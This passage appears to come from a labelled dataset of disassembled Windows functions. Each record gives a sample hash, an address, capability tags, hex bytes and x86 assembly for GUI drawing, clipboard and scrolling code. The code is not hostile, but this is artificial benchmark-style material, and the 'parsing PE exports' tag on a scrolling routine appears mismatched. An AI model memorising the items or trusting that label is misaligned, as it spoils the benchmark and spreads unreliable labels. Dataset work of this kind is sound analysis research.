"mov ecx, dword [esp + 0x34]",
"mov edx, dword [esp + 0x2c]",
"mov eax, dword [esp + 0x4c]",
"sub ecx, edx",
"cmp eax, ecx",
"jge 0x447c6d",
"or ebp, 0x20",
"jmp 0x447c70",
"or ebp, 0x10",
"mov eax, dword [esp + 0x14]",
"test byte [eax + 0x44], 8",
"je 0x447c87",
"mov ecx, dword [eax + 0x6c]",
"test ecx, ecx",
"je 0x447c87",
"or ebp, 0x100",
"mov edi, dword [esi]",
"lea ecx, [esp + 0x90]",
"call fcn.00453d00",
"push eax",
"mov ecx, esi",
"call dword [edi + 0x30]",
"push 1",
"mov ecx, esi",
"call fcn.004b2e71",
"mov eax, dword [esp + 0x10]",
"mov edx, dword [esi]",
"lea edi, [esp + 0x2c]",
"push ebp",
"mov ecx, dword [eax - 8]",
"push edi",
"push ecx",
"push eax",
"mov ecx, esi",
"call dword [edx + 0x68]",
"mov ecx, dword [esp + 0x18]",
"mov eax, dword [esi]",
"push ecx",
"mov ecx, esi",
"call dword [eax + 0x28]",
"mov dword [esp + 0x3c], vtable.CGdiObject.0",
"lea ecx, [esp + 0x3c]",
"mov byte [esp + 0xd4], 6",
"call fcn.004b3798",
"mov ebp, dword [esp + 0xe0]",
"lea ecx, [esp + 0x10]",
"mov byte [esp + 0xd4], 1",
"call fcn.004acaf4",
"jmp 0x44809c",
"cmp eax, 1",
"je 0x447d0a",
"cmp eax, 2",
"jne 0x448095",
"lea ecx, [esp + 0x90]",
"call fcn.00442950",
"test eax, eax",
"mov dword [esp + 0x18], eax",
"je 0x448095",
"mov eax, dword [esp + 0x28]",
"lea edx, [esp + 0x2c]",
"neg eax",
"push eax",
"push eax",
"push edx",
"call dword [sym.imp.USER32.dll_InflateRect]",
"mov ecx, dword [esi + 8]",
"lea eax, [esp + 0x2c]",
"push 2",
"push eax",
"push ecx",
"call dword [sym.imp.GDI32.dll_LPtoDP]",
"mov edx, dword [esi]",
"mov ecx, esi",
"call dword [edx + 0x1c]",
"mov eax, dword [esi]",
"push 1",
"mov ecx, esi",
"call dword [eax + 0x34]",
"push 0",
"push 0",
"push 0",
"push 0",
"call dword [sym.imp.GDI32.dll_CreateRectRgn]",
"mov ecx, dword [esi + 4]",
"mov ebx, eax",
"push ebx",
"push ecx",
"mov dword [esp + 0x94], ebx",
"call dword [sym.imp.GDI32.dll_GetClipRgn]",
"mov ebp, eax",
"mov dword [esp + 0x50], 0",
"dec ebp",
"mov dword [esp + 0x4c], vtable.CRgn.0",
"neg ebp",
"sbb ebp, ebp",
"inc ebp",
"mov dword [esp + 0x3c], ebp",
"mov edx, dword [esp + 0x14]",
"mov byte [esp + 0xd4], 7",
"test byte [edx + 0x44], 8",
"je 0x447daf",
"mov eax, edx",
"mov ecx, dword [eax + 0x6c]",
"test ecx, ecx",
"jne 0x447dd2",
"lea ecx, [esp + 0x2c]",
"push ecx",
"call dword [sym.imp.GDI32.dll_CreateRectRgnIndirect]",
"push eax",
"lea ecx, [esp + 0x50]",
"call fcn.004b3741",
"lea edx, [esp + 0x4c]",
"push 1",
"push edx",
"mov ecx, esi",
"call fcn.004b337f",
"mov ecx, dword [esp + 0x18]",
"xor eax, eax",
"mov dword [esp + 0x68], eax",
"mov dword [esp + 0x64], eax",
"mov dword [esp + 0x74], eax",
"mov dword [esp + 0x78], eax",
"mov dword [esp + 0x6c], eax",
"mov dword [esp + 0x70], eax",
"lea eax, [esp + 0x64]",
"push eax",
"push ecx",
"push esi",
"call fcn.0043bad0",
"cmp eax, 1",
"jne 0x448042",
"mov ebp, dword [esp + 0x2c]",
"mov eax, dword [esp + 0x30]",
"mov ebx, dword [esp + 0x34]",
"mov ecx, dword [esp + 0x38]",
"sub ebx, ebp",
"sub ecx, eax",
"cmp edi, 0xa",
"mov dword [esp + 0x48], ebp",
"mov dword [esp + 0x10], eax",
"mov dword [esp + 0x18], ebx",
"mov dword [esp + 0x28], ecx",
"jne 0x447e43",
"push 0xcc0020",
"push ecx",
"mov edx, eax",
"push ebx",
"push edx",
"lea eax, [esp + 0x74]",
"push ebp",
"push eax",
"jmp 0x448028",
"cmp edi, 0xd",
"je 0x447f08",
"cmp edi, 0xe",
"je 0x447f08",
"cmp edi, 0xc",
"je 0x447f08",
"cmp edi, 0xb",
"je 0x447f08",
"cmp edi, 2",
"je 0x447e91",
"cmp edi, 5",
"je 0x447e91",
"cmp edi, 8",
"je 0x447e91",
"cmp edi, 3",
"je 0x447e85",
"cmp edi, 6",
"je 0x447e85",
"cmp edi, 9",
"jne 0x447ea4",
"sub ebx, dword [esp + 0x6c]",
"add ebx, ebp",
"mov dword [esp + 0x48], ebx",
"jmp 0x447ea4",
"mov edx, dword [esp + 0x6c]",
"mov eax, ebx",
"sub eax, edx",
"cdq",
"sub eax, edx",
"sar eax, 1",
"add eax, ebp",
"mov dword [esp + 0x48], eax",
"cmp edi, 4",
"je 0x447ed4",
"cmp edi, 5",
"je 0x447ed4",
"cmp edi, 6",
"je 0x447ed4",
"cmp edi, 7",
"je 0x447ec2",
"cmp edi, 8",
"je 0x447ec2",
"cmp edi, 9",
"jne 0x447eeb",
"mov edx, dword [esp + 0x70]",
"mov eax, dword [esp + 0x30]",
"sub ecx, edx",
"add ecx, eax",
"mov dword [esp + 0x10], ecx",
"jmp 0x447eeb",
"mov ebx, dword [esp + 0x70]",
"mov eax, ecx",
"mov ecx, dword [esp + 0x30]",
"sub eax, ebx",
"cdq",
"sub eax, edx",
"sar eax, 1",
"add eax, ecx",
"mov dword [esp + 0x10], eax",
"mov ecx, dword [esp + 0x10]",
"mov edx, dword [esp + 0x48]",
"push 0xcc0020",
"push 0xffffffffffffffff",
"push 0xffffffffffffffff",
"push ecx",
"lea eax, [esp + 0x74]",
"push edx",
"push eax",
"jmp 0x448028",
"mov ecx, dword [esp + 0x70]",
"mov ebp, dword [esp + 0x6c]",
"cmp edi, 0xd",
"mov dword [esp + 0x5c], ecx",
"je 0x447f84",
"fild dword [esp + 0x6c]",
"fst qword [esp + 0x5c]",
"fidivr dword [esp + 0x18]",
"fild dword [esp + 0x70]",
"fst qword [esp + 0x18]",
"fild dword [esp + 0x28]",
"fdiv st(1)",
"fstp qword [esp + 0x7c]",
"fstp st(0)",
"fcom qword [esp + 0x7c]",
"fnstsw ax",
"test ah, 1",
"jne 0x447f4a",
"fstp st(0)",
"fld qword [esp + 0x7c]",
"cmp edi, 0xb",
"jne 0x447f66",
"fld qword [0x4dcf90]",
"fcomp st(1)",
"fnstsw ax",
"test ah, 1",
"je 0x447f66",
"fstp st(0)",
"fld qword [0x4dcf90]",
"fld qword [esp + 0x5c]",
"fmul st(1)",
"call fcn.00489348",
"fld qword [esp + 0x18]",
"fmul st(1)",
"mov ebp, eax",
"call fcn.00489348",
"fstp st(0)",
"mov dword [esp + 0x5c], eax",
"cmp edi, 0xc",
"je 0x447ff6",
"cmp edi, 0xb",
"je 0x447ff6",
"mov eax, dword [esp + 0x28]",
"mov dword [esp + 0x18], 0",
"test eax, eax",
"jle 0x44802d",
"mov eax, dword [esp + 0x18]",
"xor edi, edi",
"test ebx, ebx",
"jle 0x447fe2",
"mov edx, dword [esp + 0x10]",
"add eax, edx",
"mov dword [esp + 0x7c], eax",
"mov eax, dword [esp + 0x5c]",
"mov edx, dword [esp + 0x48]",
"mov ecx, dword [esp + 0x7c]",
"push 0xcc0020",
"push eax",
"push ebp",
"push ecx",
"lea eax, [edi + edx]",
"lea ecx, [esp + 0x74]",
"push eax",
"push ecx",
"call fcn.0043bd30",
"add edi, ebp",
"cmp edi, ebx",
"jl 0x447fb6",
"mov eax, dword [esp + 0x18]",
"mov edx, dword [esp + 0x5c]",
"mov ecx, dword [esp + 0x28]",
"add eax, edx",
"cmp eax, ecx",
"mov dword [esp + 0x18], eax",
"jl 0x447fa6",
"jmp 0x44802d",
"mov ecx, dword [esp + 0x5c]",
"mov eax, dword [esp + 0x28]",
"mov edi, dword [esp + 0x30]",
"sub eax, ecx",
"cdq",
"sub eax, edx",
"push 0xcc0020",
"sar eax, 1",
"push ecx",
"add eax, edi",
"push ebp",
"push eax",
"mov eax, ebx",
"sub eax, ebp",
"cdq",
"sub eax, edx",
"mov edx, dword [esp + 0x3c]",
"sar eax, 1",
"add eax, edx",
"lea edx, [esp + 0x74]",
"push eax",
"push edx",
"call fcn.0043bd30",
"lea eax, [esp + 0x64]",
"push eax",
"call fcn.0043c090",
"mov ebx, dword [esp + 0x8c]",
"mov ebp, dword [esp + 0x3c]",
"cmp ebp, 1",
"jne 0x448054",
"mov ecx, dword [esi + 4]",
"push ebx",
"push ecx",
"call dword [sym.imp.GDI32.dll_SelectClipRgn]",
"jmp 0x44805d",
"push 0",
"mov ecx, esi",
"call fcn.004b31c2",
"push ebx",
"call dword [sym.imp.GDI32.dll_DeleteObject]",
"mov edx, dword [esi]",
"push 0xffffffffffffffff",
"mov ecx, esi",
"call dword [edx + 0x20]",
"mov dword [esp + 0x4c], vtable.CGdiObject.0",
"lea ecx, [esp + 0x4c]",
"mov byte [esp + 0xd4], 8",
"call fcn.004b3798",
"mov ebx, dword [esp + 0xe4]",
"mov byte [esp + 0xd4], 1",
"mov ebp, dword [esp + 0xe0]",
"mov eax, dword [esp + 0x44]",
"mov ecx, dword [esp + 0xf0]",
"push eax",
"mov eax, dword [esp + 0xf0]",
"lea edx, [esp + 0x24]",
"push ecx",
"mov ecx, dword [esp + 0xf0]",
"push edx",
"push eax",
"push ecx",
"mov ecx, dword [esp + 0x28]",
"push ebx",
"push ebp",
"push esi",
"call fcn.00448120",
"mov dword [esp + 0x84], vtable.CGdiObject.0",
"lea ecx, [esp + 0x84]",
"mov byte [esp + 0xd4], 9",
"call fcn.004b3798",
"lea ecx, [esp + 0x90]",
"mov dword [esp + 0xd4], 0xffffffff",
"call fcn.00442820",
"mov ecx, dword [esp + 0xcc]",
"pop edi",
"pop esi",
"pop ebp",
"pop ebx",
"mov dword fs:[0], ecx",
"add esp, 0xc8",
"ret 0x20"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x44a1d0
|
[
"Open clipboard",
"Write clipboard data"
] |
64a1000000006aff68b8b34b00506489250000000083ec145355568bf1e84ea6ffff85c00f84de0000008d4c240ce81d91fcff8b44243c8b4c24388b542434508b44243451528d4c241850518bcec744243c00000000e815a6ffff8bc8e81e69ffff85c00f84850000008b44241c85c08be8747b506a42ff1594f34b008bd885db746c8b74241c8b542414f7de57531bf623f2ff1598f34b008bcd8bf88bd1c1e902f3a58bca83e103f3a48d4c2410e89c92fcff53ff159cf34b006a00ff1574f64b0085c05f750953ff1538f34b00eb1eff156cf64b00a1087d51005325ffff000050ff1570f64b00ff157cf64b008d4c240cc7442428ffffffffc744240ca8cf4d00e84892fcff8b4c24205e5d5b64890d0000000083c420c21000
|
[
"mov eax, dword fs:[0]",
"push 0xffffffffffffffff",
"push 0x4bb3b8",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0x14",
"push ebx",
"push ebp",
"push esi",
"mov esi, ecx",
"call fcn.00444840",
"test eax, eax",
"je 0x44a2d8",
"lea ecx, [esp + 0xc]",
"call fcn.00413320",
"mov eax, dword [esp + 0x3c]",
"mov ecx, dword [esp + 0x38]",
"mov edx, dword [esp + 0x34]",
"push eax",
"mov eax, dword [esp + 0x34]",
"push ecx",
"push edx",
"lea ecx, [esp + 0x18]",
"push eax",
"push ecx",
"mov ecx, esi",
"mov dword [esp + 0x3c], 0",
"call fcn.00444840",
"mov ecx, eax",
"call fcn.00440b50",
"test eax, eax",
"je 0x44a2bf",
"mov eax, dword [esp + 0x1c]",
"test eax, eax",
"mov ebp, eax",
"je 0x44a2bf",
"push eax",
"push 0x42",
"call dword [sym.imp.KERNEL32.dll_GlobalAlloc]",
"mov ebx, eax",
"test ebx, ebx",
"je 0x44a2bf",
"mov esi, dword [esp + 0x1c]",
"mov edx, dword [esp + 0x14]",
"neg esi",
"push edi",
"push ebx",
"sbb esi, esi",
"and esi, edx",
"call dword [sym.imp.KERNEL32.dll_GlobalLock]",
"mov ecx, ebp",
"mov edi, eax",
"mov edx, ecx",
"shr ecx, 2",
"rep movsd dword es:[edi], dword [esi]",
"mov ecx, edx",
"and ecx, 3",
"rep movsb byte es:[edi], byte [esi]",
"lea ecx, [esp + 0x10]",
"call fcn.00413520",
"push ebx",
"call dword [sym.imp.KERNEL32.dll_GlobalUnlock]",
"push 0",
"call dword [sym.imp.USER32.dll_OpenClipboard]",
"test eax, eax",
"pop edi",
"jne 0x44a2a1",
"push ebx",
"call dword [sym.imp.KERNEL32.dll_GlobalFree]",
"jmp 0x44a2bf",
"call dword [sym.imp.USER32.dll_EmptyClipboard]",
"mov eax, dword [0x517d08]",
"push ebx",
"and eax, 0xffff",
"push eax",
"call dword [sym.imp.USER32.dll_SetClipboardData]",
"call dword [sym.imp.USER32.dll_CloseClipboard]",
"lea ecx, [esp + 0xc]",
"mov dword [esp + 0x28], 0xffffffff",
"mov dword [esp + 0xc], 0x4dcfa8",
"call fcn.00413520",
"mov ecx, dword [esp + 0x20]",
"pop esi",
"pop ebp",
"pop ebx",
"mov dword fs:[0], ecx",
"add esp, 0x20",
"ret 0x10"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x44a320
|
[
"Open clipboard",
"Read clipboard data"
] |
83ec0c535556578bf9e812a5ffff85c00f84d90000008bcfe803a5ffff8bc8e8dc65ffff85c00f85c300000050ff1574f64b0085c00f84b4000000a1087d510025ffff000050ff1578f64b008bf085f67510ff157cf64b005f5e5d5b83c40cc20c008d4c24108b6c24246a01518b4f448d54241cc1e9048d442420528b54242c83e1015051555256ff1534f34b005056ff1598f34b00508bcfe882a4ffff8bc8e86b68ffff568bd8ff159cf34b00ff157cf64b008b4c2428b8010000003bc8752e3bd8752a39442410750a8b078bcfff90cc0000008b4424148b4c24188b17508b4424245155508bcfff92c00000005f5e5d5b83c40cc20c00
|
[
"sub esp, 0xc",
"push ebx",
"push ebp",
"push esi",
"push edi",
"mov edi, ecx",
"call fcn.00444840",
"test eax, eax",
"je 0x44a40f",
"mov ecx, edi",
"call fcn.00444840",
"mov ecx, eax",
"call fcn.00440920",
"test eax, eax",
"jne 0x44a40f",
"push eax",
"call dword [sym.imp.USER32.dll_OpenClipboard]",
"test eax, eax",
"je 0x44a40f",
"mov eax, dword [0x517d08]",
"and eax, 0xffff",
"push eax",
"call dword [sym.imp.USER32.dll_GetClipboardData]",
"mov esi, eax",
"test esi, esi",
"jne 0x44a382",
"call dword [sym.imp.USER32.dll_CloseClipboard]",
"pop edi",
"pop esi",
"pop ebp",
"pop ebx",
"add esp, 0xc",
"ret 0xc",
"lea ecx, [esp + 0x10]",
"mov ebp, dword [esp + 0x24]",
"push 1",
"push ecx",
"mov ecx, dword [edi + 0x44]",
"lea edx, [esp + 0x1c]",
"shr ecx, 4",
"lea eax, [esp + 0x20]",
"push edx",
"mov edx, dword [esp + 0x2c]",
"and ecx, 1",
"push eax",
"push ecx",
"push ebp",
"push edx",
"push esi",
"call dword [sym.imp.KERNEL32.dll_GlobalSize]",
"push eax",
"push esi",
"call dword [sym.imp.KERNEL32.dll_GlobalLock]",
"push eax",
"mov ecx, edi",
"call fcn.00444840",
"mov ecx, eax",
"call fcn.00440c30",
"push esi",
"mov ebx, eax",
"call dword [sym.imp.KERNEL32.dll_GlobalUnlock]",
"call dword [sym.imp.USER32.dll_CloseClipboard]",
"mov ecx, dword [esp + 0x28]",
"mov eax, 1",
"cmp ecx, eax",
"jne 0x44a40f",
"cmp ebx, eax",
"jne 0x44a40f",
"cmp dword [esp + 0x10], eax",
"jne 0x44a3f5",
"mov eax, dword [edi]",
"mov ecx, edi",
"call dword [eax + 0xcc]",
"mov eax, dword [esp + 0x14]",
"mov ecx, dword [esp + 0x18]",
"mov edx, dword [edi]",
"push eax",
"mov eax, dword [esp + 0x24]",
"push ecx",
"push ebp",
"push eax",
"mov ecx, edi",
"call dword [edx + 0xc0]",
"pop edi",
"pop esi",
"pop ebp",
"pop ebx",
"add esp, 0xc",
"ret 0xc"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x44a77c
|
[
"Resolve function by parsing pe exports"
] |
64a1000000006aff6826b44b00506489250000000081ece000000053568bf1e8bca0ffff8bd88b8424f800000083f8010f848000000083c0fd83f8037774ff2485a4ae44006a018bcee852a4ffff6a016a006a006a006a008bcee841c5ffff8b461c6a006a0050ff1534f64b0033c0e9990000006a018bcee813a0ffff33c0e9890000008b464c8b4e543bc17c028bc18b8c24fc00000050518bcee8b0c3ffff33c0eb698b561c6a006a0052ff1534f64b0033c0eb578b8424fc0000005583f80c577745ff2485b4ae44006a008bcee8cca3ffff8b464c8b4e543bc17c028bc18b56488b7e503bd77c028bd76a016a006a0050528bcee8a5c4ffff8b461c6a006a0050ff1534f64b005f33c05d8b8c24e80000005e5b64890d0000000081c4ec000000c20c006a008bcee871a3ffff8bcbe8aa5dffff8be885ed0f84a40200008bcbe8d95dffff85c00f84950200008b8424080100008b942404010000b9030000008b383bd175233b68047f1e6a016a006a006a006a008bcee822c4ffff8b4e1c6a006a0051e978ffffff8b9424040100008b6e483bd1750d3bfd0f8fb9000000036804eb0d3bfd7d092b68043bfd7e028bef83fdff0f849e0000008bcbe8dd5dffff3bc57e0d8bcbe8d25dffff89442410eb04896c24108bcbe8015dffff8b4c2410483bc18bcb7d08e8f15cffff48eb14e8a95dffff3bc57e098bcbe89e5dffffeb028bc58b564c8bce52508d8424e800000050e886dbffff8d4c242c5051ff159cf54b008b44242c83f8ff741a8b5424308b4c243489464c8b442438895648894650894e54eb116a016a006a006a006a008bcee846c3ffff8bcbe87f5cffff483bc77d0a8bcbe8735cffff48eb028bc785c07d0433ffeb168bcbe85f5cffff483bc77d0a8bcbe8535cffff8bf84f8bcbe8895cffff33ed8944241085c07e1c55578bcbe8565dffffa90000080074054f33edeb01453b6c24107ce48bcbc744241400000000e8d45cffff3bf87d398d5424708bce52e8a497ffff8b400433db85ff894424187e6f538bcee8cf95ffff8b4c241850518bcee89299ffff43894424183bdf7ce2eb4f6a016a016a008d94248c00000057528bcee8f1c9ffff8b480485c97d0433ffeb196a016a016a008d8424dc00000057508bcee8d0c9ffff8b78048d4c2460518bcee881b9ffff8b500403d7895424186a008d4c2450e8d68906008b465c8b4e58508d5424505152c784240401000000000000e8400501008b4c246083c40c8d4424146a015051ff1594f14b008b461c8d54243c5250ff1538f64b008b4c24188d54243c52894c2444ff150cf64b0085c075108b4e1c508d4424405051ff1534f64b008d4c244cc78424f8000000ffffffffe8cc890600e925fdffff6a016a006a006a006a008bcee8abc1ffff8b561c6a006a0052e901fdffff6a008bcee895a0ffff8bcbe80e5bffff8bcb8be8e8c55affff85c00f844afdffff85ed0f8442fdffff8b8424080100008b942404010000b9040000008b383bd175143b68047f0f6a016a006a006a006a00e99cfcffff8b9424040100008b6e4c3bd1750d3bfd0f8fb9000000036804eb0d3bfd7d092b68043bfd7e028bef83fdff0f849e0000008bcbe8205bffff3bc57e0d8bcbe8155bffff89442410eb04896c24108bcbe8745affff8b4c2410483bc18bcb7d08e8645affff48eb14e8ec5affff3bc57e098bcbe8e15affffeb028bc58b4e48508d9424b400000051528bcee8b9d8ffff508d44243050ff159cf54b008b44242c83f8ff741a8b4c24308b54243889464c8b442434894e48895650894654eb116a016a006a006a006a008bcee879c0ffff8bcbe8f259ffff483bc77d0a8bcbe8e659ffff48eb028bc785c07d0433ffeb168bcbe8d259ffff483bc77d0a8bcbe8c659ffff8bf84f8bcbe87c59ffff33ed8944241085c07e1c57558bcbe8895affffa90000040074054f33edeb01453b6c24107ce48bcbc744241800000000e8175affff3bf87d388d4c2468518bcee8d794ffff8b1033db85ff895424147e6b538bcee8e393ffff508b442418508bcee89695ffff43894424143bdf7ce2eb4b6a016a01578d8c249c0000006a00518bcee825c7ffff8338007d0433ffeb186a016a01578d9424ac0000006a00528bcee806c7ffff8b388d4424788bce50e8b8b6ffff8b0803cf894c24146a008d4c2450e80e8706008b565c8b4658528d4c24505051c784240401000001000000e8780201008b44246083c40c8d5424146a015250ff1594f14b008b561c8d4c243c5152ff1538f64b008b4424148d4c243c5189442440ff150cf64b0085c07510508b461c8d5424405250ff1534f64b008d4c244cc78424f8000000ffffffffe804870600e95dfaffff8b8424080100008b48048b780c8b108b4008894c241c8d4c0fff894c2424895424208d4c10ff8d54241c894c2428528bcbe8ae61ffff8b4c24248b44241c8b5424282bc841518b4c24242bd14252508d8424cc00000051508bcee835b9ffff8d4c241c5051ff159cf54b006a018d5424206a0152ff15c4f54b008b4e1c8d44241c6a005051ff1534f64b008bcee832bdffffe9c6f9ffff
|
[
"mov eax, dword fs:[0]",
"push 0xffffffffffffffff",
"push 0x4bb426",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0xe0",
"push ebx",
"push esi",
"mov esi, ecx",
"call fcn.00444840",
"mov ebx, eax",
"mov eax, dword [esp + 0xf8]",
"cmp eax, 1",
"je 0x44a816",
"add eax, 0xfffffffd",
"cmp eax, 3",
"ja case.default.0x44a79e",
"jmp dword [eax*4 + 0x44aea4]",
"push 1",
"mov ecx, esi",
"call fcn.00444c00",
"push 1",
"push 0",
"push 0",
"push 0",
"push 0",
"mov ecx, esi",
"call fcn.00446d00",
"mov eax, dword [esi + 0x1c]",
"push 0",
"push 0",
"push eax",
"call dword [sym.imp.USER32.dll_InvalidateRect]",
"xor eax, eax",
"jmp 0x44a86d",
"push 1",
"mov ecx, esi",
"call fcn.004447f0",
"xor eax, eax",
"jmp 0x44a86d",
"mov eax, dword [esi + 0x4c]",
"mov ecx, dword [esi + 0x54]",
"cmp eax, ecx",
"jl 0x44a7f0",
"mov eax, ecx",
"mov ecx, dword [esp + 0xfc]",
"push eax",
"push ecx",
"mov ecx, esi",
"call fcn.00446bb0",
"xor eax, eax",
"jmp 0x44a86d",
"mov edx, dword [esi + 0x1c]",
"push 0",
"push 0",
"push edx",
"call dword [sym.imp.USER32.dll_InvalidateRect]",
"xor eax, eax",
"jmp 0x44a86d",
"mov eax, dword [esp + 0xfc]",
"push ebp",
"cmp eax, 0xc",
"push edi",
"ja case.default.0x44a824",
"jmp dword [eax*4 + 0x44aeb4]",
"push 0",
"mov ecx, esi",
"call fcn.00444c00",
"mov eax, dword [esi + 0x4c]",
"mov ecx, dword [esi + 0x54]",
"cmp eax, ecx",
"jl 0x44a840",
"mov eax, ecx",
"mov edx, dword [esi + 0x48]",
"mov edi, dword [esi + 0x50]",
"cmp edx, edi",
"jl 0x44a84c",
"mov edx, edi",
"push 1",
"push 0",
"push 0",
"push eax",
"push edx",
"mov ecx, esi",
"call fcn.00446d00",
"mov eax, dword [esi + 0x1c]",
"push 0",
"push 0",
"push eax",
"call dword [sym.imp.USER32.dll_InvalidateRect]",
"pop edi",
"xor eax, eax",
"pop ebp",
"mov ecx, dword [esp + 0xe8]",
"pop esi",
"pop ebx",
"mov dword fs:[0], ecx",
"add esp, 0xec",
"ret 0xc",
"push 0",
"mov ecx, esi",
"call fcn.00444c00",
"mov ecx, ebx",
"call fcn.00440640",
"mov ebp, eax",
"test ebp, ebp",
"je 0x44ab44",
"mov ecx, ebx",
"call fcn.00440680",
"test eax, eax",
"je 0x44ab44",
"mov eax, dword [esp + 0x108]",
"mov edx, dword [esp + 0x104]",
"mov ecx, 3",
"mov edi, dword [eax]",
"cmp edx, ecx",
"jne 0x44a8eb",
"cmp ebp, dword [eax + 4]",
"jg 0x44a8eb",
"push 1",
"push 0",
"push 0",
"push 0",
"push 0",
"mov ecx, esi",
"call fcn.00446d00",
"mov ecx, dword [esi + 0x1c]",
"push 0",
"push 0",
"push ecx",
"jmp 0x44a863",
"mov edx, dword [esp + 0x104]",
"mov ebp, dword [esi + 0x48]",
"cmp edx, ecx",
"jne 0x44a906",
"cmp edi, ebp",
"jg 0x44a9ba",
"add ebp, dword [eax + 4]",
"jmp 0x44a913",
"cmp edi, ebp",
"jge 0x44a913",
"sub ebp, dword [eax + 4]",
"cmp edi, ebp",
"jle 0x44a913",
"mov ebp, edi",
"cmp ebp, 0xffffffff",
"je 0x44a9ba",
"mov ecx, ebx",
"call fcn.00440700",
"cmp eax, ebp",
"jle 0x44a934",
"mov ecx, ebx",
"call fcn.00440700",
"mov dword [esp + 0x10], eax",
"jmp 0x44a938",
"mov dword [esp + 0x10], ebp",
"mov ecx, ebx",
"call fcn.00440640",
"mov ecx, dword [esp + 0x10]",
"dec eax",
"cmp eax, ecx",
"mov ecx, ebx",
"jge 0x44a952",
"call fcn.00440640",
"dec eax",
"jmp 0x44a966",
"call fcn.00440700",
"cmp eax, ebp",
"jle 0x44a964",
"mov ecx, ebx",
"call fcn.00440700",
"jmp 0x44a966",
"mov eax, ebp",
"mov edx, dword [esi + 0x4c]",
"mov ecx, esi",
"push edx",
"push eax",
"lea eax, [esp + 0xe8]",
"push eax",
"call fcn.00448500",
"lea ecx, [esp + 0x2c]",
"push eax",
"push ecx",
"call dword [sym.imp.USER32.dll_CopyRect]",
"mov eax, dword [esp + 0x2c]",
"cmp eax, 0xffffffff",
"je 0x44a9a9",
"mov edx, dword [esp + 0x30]",
"mov ecx, dword [esp + 0x34]",
"mov dword [esi + 0x4c], eax",
"mov eax, dword [esp + 0x38]",
"mov dword [esi + 0x48], edx",
"mov dword [esi + 0x50], eax",
"mov dword [esi + 0x54], ecx",
"jmp 0x44a9ba",
"push 1",
"push 0",
"push 0",
"push 0",
"push 0",
"mov ecx, esi",
"call fcn.00446d00",
"mov ecx, ebx",
"call fcn.00440640",
"dec eax",
"cmp eax, edi",
"jge 0x44a9d0",
"mov ecx, ebx",
"call fcn.00440640",
"dec eax",
"jmp 0x44a9d2",
"mov eax, edi",
"test eax, eax",
"jge 0x44a9da",
"xor edi, edi",
"jmp 0x44a9f0",
"mov ecx, ebx",
"call fcn.00440640",
"dec eax",
"cmp eax, edi",
"jge 0x44a9f0",
"mov ecx, ebx",
"call fcn.00440640",
"mov edi, eax",
"dec edi",
"mov ecx, ebx",
"call fcn.00440680",
"xor ebp, ebp",
"mov dword [esp + 0x10], eax",
"test eax, eax",
"jle 0x44aa1d",
"push ebp",
"push edi",
"mov ecx, ebx",
"call fcn.00440760",
"test eax, 0x80000",
"je 0x44aa16",
"dec edi",
"xor ebp, ebp",
"jmp 0x44aa17",
"inc ebp",
"cmp ebp, dword [esp + 0x10]",
"jl 0x44aa01",
"mov ecx, ebx",
"mov dword [esp + 0x14], 0",
"call fcn.00440700",
"cmp edi, eax",
"jge 0x44aa69",
"lea edx, [esp + 0x70]",
"mov ecx, esi",
"push edx",
"call fcn.004441e0",
"mov eax, dword [eax + 4]",
"xor ebx, ebx",
"test edi, edi",
"mov dword [esp + 0x18], eax",
"jle 0x44aab8",
"push ebx",
"mov ecx, esi",
"call fcn.00444020",
"mov ecx, dword [esp + 0x18]",
"push eax",
"push ecx",
"mov ecx, esi",
"call fcn.004443f0",
"inc ebx",
"mov dword [esp + 0x18], eax",
"cmp ebx, edi",
"jl 0x44aa49",
"jmp 0x44aab8",
"push 1",
"push 1",
"push 0",
"lea edx, [esp + 0x8c]",
"push edi",
"push edx",
"mov ecx, esi",
"call fcn.00447470",
"mov ecx, dword [eax + 4]",
"test ecx, ecx",
"jge 0x44aa8a",
"xor edi, edi",
"jmp 0x44aaa3",
"push 1",
"push 1",
"push 0",
"lea eax, [esp + 0xdc]",
"push edi",
"push eax",
"mov ecx, esi",
"call fcn.00447470",
"mov edi, dword [eax + 4]",
"lea ecx, [esp + 0x60]",
"push ecx",
"mov ecx, esi",
"call fcn.00446430",
"mov edx, dword [eax + 4]",
"add edx, edi",
"mov dword [esp + 0x18], edx",
"push 0",
"lea ecx, [esp + 0x50]",
"call fcn.004b3499",
"mov eax, dword [esi + 0x5c]",
"mov ecx, dword [esi + 0x58]",
"push eax",
"lea edx, [esp + 0x50]",
"push ecx",
"push edx",
"mov dword [esp + 0x104], 0",
"call fcn.0045b020",
"mov ecx, dword [esp + 0x60]",
"add esp, 0xc",
"lea eax, [esp + 0x14]",
"push 1",
"push eax",
"push ecx",
"call dword [sym.imp.GDI32.dll_LPtoDP]",
"mov eax, dword [esi + 0x1c]",
"lea edx, [esp + 0x3c]",
"push edx",
"push eax",
"call dword [sym.imp.USER32.dll_GetClientRect]",
"mov ecx, dword [esp + 0x18]",
"lea edx, [esp + 0x3c]",
"push edx",
"mov dword [esp + 0x44], ecx",
"call dword [sym.imp.USER32.dll_IsRectEmpty]",
"test eax, eax",
"jne 0x44ab2b",
"mov ecx, dword [esi + 0x1c]",
"push eax",
"lea eax, [esp + 0x40]",
"push eax",
"push ecx",
"call dword [sym.imp.USER32.dll_InvalidateRect]",
"lea ecx, [esp + 0x4c]",
"mov dword [esp + 0xf8], 0xffffffff",
"call fcn.004b350b",
"jmp case.default.0x44a824",
"push 1",
"push 0",
"push 0",
"push 0",
"push 0",
"mov ecx, esi",
"call fcn.00446d00",
"mov edx, dword [esi + 0x1c]",
"push 0",
"push 0",
"push edx",
"jmp 0x44a863",
"push 0",
"mov ecx, esi",
"call fcn.00444c00",
"mov ecx, ebx",
"call fcn.00440680",
"mov ecx, ebx",
"mov ebp, eax",
"call fcn.00440640",
"test eax, eax",
"je 0x44a8cd",
"test ebp, ebp",
"je 0x44a8cd",
"mov eax, dword [esp + 0x108]",
"mov edx, dword [esp + 0x104]",
"mov ecx, 4",
"mov edi, dword [eax]",
"cmp edx, ecx",
"jne 0x44abb8",
"cmp ebp, dword [eax + 4]",
"jg 0x44abb8",
"push 1",
"push 0",
"push 0",
"push 0",
"push 0",
"jmp 0x44a854",
"mov edx, dword [esp + 0x104]",
